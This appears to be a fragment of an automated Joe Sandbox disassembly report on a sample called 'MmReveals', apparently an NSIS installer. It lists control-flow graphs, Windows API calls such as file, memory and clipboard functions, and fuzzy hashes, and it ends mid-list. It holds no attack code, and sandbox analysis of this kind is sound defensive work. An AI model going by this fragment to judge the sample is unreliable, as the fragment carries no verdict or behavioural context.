                          control_flow_graph 731 405e7f-405e8b 732 405e8c-405ec0 GetTickCount GetTempFileNameW 731->732 733 405ec2-405ec4 732->733 734 405ecf-405ed1 732->734 733->732 736 405ec6 733->736 735 405ec9-405ecc 734->735 736->735
                          APIs
                          • GetTickCount.KERNEL32 ref: 00405E9D
                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: CountFileNameTempTick
                          • String ID: nsa
                          • API String ID: 1716503409-2209301699
                          • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                          • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                          • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                          • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

                          Control-flow Graph

                          control_flow_graph 737 4078c5-4078cb 738 4078d0-4078eb 737->738 739 4078cd-4078cf 737->739 740 407aeb-407aff 738->740 741 407bad-407bba 738->741 739->738 743 407b01-407b17 740->743 744 407b19-407b2c 740->744 742 407be7-407beb 741->742 745 407c4a-407c5d 742->745 746 407bed-407c0c 742->746 747 407b33-407b3a 743->747 744->747 750 407c65-407c68 745->750 751 407c25-407c39 746->751 752 407c0e-407c23 746->752 748 407b61-407b64 747->748 749 407b3c-407b40 747->749 748->750 753 407b46-407b5e 749->753 754 407ccd-407cd4 749->754 758 407350 750->758 759 407cec 750->759 755 407c3c-407c43 751->755 752->755 753->748 757 407cdd-407cea 754->757 760 407be1-407be4 755->760 761 407c45 755->761 762 407cef-407cf6 757->762 763 407357-40735b 758->763 764 40749b-4074b6 758->764 765 40746d-407471 758->765 766 4073ff-407403 758->766 759->762 760->742 768 407cd6 761->768 769 407bc6-407bde 761->769 763->757 771 407361-40736e 763->771 764->740 772 407c76-407c7d 765->772 773 407477-40748b 765->773 774 407409-407420 766->774 775 407c6d-407c74 766->775 768->757 769->760 771->759 776 407374-4073ba 771->776 772->757 777 40748e-407496 773->777 778 407423-407427 774->778 775->757 780 4073e2-4073e4 776->780 781 4073bc-4073c0 776->781 777->765 782 407498 777->782 778->766 779 407429-40742f 778->779 783 407431-407438 779->783 784 407459-40746b 779->784 787 4073f5-4073fd 780->787 788 4073e6-4073f3 780->788 785 4073c2-4073c5 GlobalFree 781->785 786 4073cb-4073d9 GlobalAlloc 781->786 782->764 789 407443-407453 GlobalAlloc 783->789 790 40743a-40743d GlobalFree 783->790 784->777 785->786 786->759 791 4073df 786->791 787->778 788->787 788->788 789->759 789->784 790->789 791->780
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                          • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                          • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                          • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

                          Control-flow Graph

                          control_flow_graph 792 407ac3-407ac7 793 407ac9-407bba 792->793 794 407ade-407ae4 792->794 804 407be7-407beb 793->804 796 407aeb-407aff 794->796 797 407b01-407b17 796->797 798 407b19-407b2c 796->798 801 407b33-407b3a 797->801 798->801 802 407b61-407b64 801->802 803 407b3c-407b40 801->803 807 407c65-407c68 802->807 805 407b46-407b5e 803->805 806 407ccd-407cd4 803->806 808 407c4a-407c5d 804->808 809 407bed-407c0c 804->809 805->802 810 407cdd-407cea 806->810 816 407350 807->816 817 407cec 807->817 808->807 812 407c25-407c39 809->812 813 407c0e-407c23 809->813 815 407cef-407cf6 810->815 814 407c3c-407c43 812->814 813->814 823 407be1-407be4 814->823 824 407c45 814->824 818 407357-40735b 816->818 819 40749b-4074b6 816->819 820 40746d-407471 816->820 821 4073ff-407403 816->821 817->815 818->810 825 407361-40736e 818->825 819->796 826 407c76-407c7d 820->826 827 407477-40748b 820->827 829 407409-407420 821->829 830 407c6d-407c74 821->830 823->804 831 407cd6 824->831 832 407bc6-407bde 824->832 825->817 833 407374-4073ba 825->833 826->810 834 40748e-407496 827->834 835 407423-407427 829->835 830->810 831->810 832->823 837 4073e2-4073e4 833->837 838 4073bc-4073c0 833->838 834->820 839 407498 834->839 835->821 836 407429-40742f 835->836 840 407431-407438 836->840 841 407459-40746b 836->841 844 4073f5-4073fd 837->844 845 4073e6-4073f3 837->845 842 4073c2-4073c5 GlobalFree 838->842 843 4073cb-4073d9 GlobalAlloc 838->843 839->819 846 407443-407453 GlobalAlloc 840->846 847 40743a-40743d GlobalFree 840->847 841->834 842->843 843->817 848 4073df 843->848 844->835 845->844 845->845 846->817 846->841 847->846 848->837
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                          • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                          • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                          • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

                          Control-flow Graph

                          control_flow_graph 849 407312-407330 850 407332-407335 849->850 851 40733a-407341 849->851 852 407cf0-407cf6 850->852 853 407344-40734a 851->853 854 407350 853->854 855 407cec 853->855 856 407357-40735b 854->856 857 40749b-407aff 854->857 858 40746d-407471 854->858 859 4073ff-407403 854->859 860 407cef 855->860 861 407361-40736e 856->861 862 407cdd-407cea 856->862 870 407b01-407b17 857->870 871 407b19-407b2c 857->871 863 407c76-407c7d 858->863 864 407477-40748b 858->864 866 407409-407420 859->866 867 407c6d-407c74 859->867 860->852 861->855 868 407374-4073ba 861->868 862->860 863->862 869 40748e-407496 864->869 872 407423-407427 866->872 867->862 874 4073e2-4073e4 868->874 875 4073bc-4073c0 868->875 869->858 876 407498 869->876 877 407b33-407b3a 870->877 871->877 872->859 873 407429-40742f 872->873 880 407431-407438 873->880 881 407459-40746b 873->881 884 4073f5-4073fd 874->884 885 4073e6-4073f3 874->885 882 4073c2-4073c5 GlobalFree 875->882 883 4073cb-4073d9 GlobalAlloc 875->883 876->857 878 407b61-407c68 877->878 879 407b3c-407b40 877->879 878->853 886 407b46-407b5e 879->886 887 407ccd-407cd4 879->887 888 407443-407453 GlobalAlloc 880->888 889 40743a-40743d GlobalFree 880->889 881->869 882->883 883->855 891 4073df 883->891 884->872 885->884 885->885 886->878 887->862 888->855 888->881 889->888 891->874
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                          • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                          • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                          • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                          • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                          • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                          • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                          • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                          • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                          • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                          • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                          • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                          • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                          APIs
                          • GlobalFree.KERNELBASE(?), ref: 004073C5
                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                          • GlobalFree.KERNELBASE(?), ref: 0040743D
                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Global$AllocFree
                          • String ID:
                          • API String ID: 3394109436-0
                          • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                          • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                          • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                          • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                          APIs
                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                          • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                          • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                          • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                          APIs
                          • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: File$AttributesCreate
                          • String ID:
                          • API String ID: 415043291-0
                          • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                          • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                          • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                          • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                          APIs
                          • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                          • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                          • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                          • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                          APIs
                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                          • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                          • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                          • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                          APIs
                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                          • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Char$Next$CreateDirectoryPrev
                          • String ID:
                          • API String ID: 4115351271-0
                          • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                          • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                          • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                          • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                          APIs
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                          • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                          • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                          • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                          APIs
                          • GetDlgItem.USER32(?,00000403), ref: 0040512F
                          • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                          • GetClientRect.USER32(?,?), ref: 00405196
                          • GetSystemMetrics.USER32(00000015), ref: 0040519E
                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                          • ShowWindow.USER32(?,00000008), ref: 0040523A
                          • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                          • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                            • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                          • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                          • CreateThread.KERNEL32(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                          • CloseHandle.KERNEL32(00000000), ref: 004052C0
                          • ShowWindow.USER32(00000000), ref: 004052E7
                          • ShowWindow.USER32(?,00000008), ref: 004052EC
                          • ShowWindow.USER32(00000008), ref: 00405333
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                          • CreatePopupMenu.USER32 ref: 00405376
                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                          • GetWindowRect.USER32(?,?), ref: 0040539E
                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                          • OpenClipboard.USER32(00000000), ref: 0040540B
                          • EmptyClipboard.USER32 ref: 00405411
                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                          • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405427
                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040545D
                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                          • CloseClipboard.USER32 ref: 0040546E
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
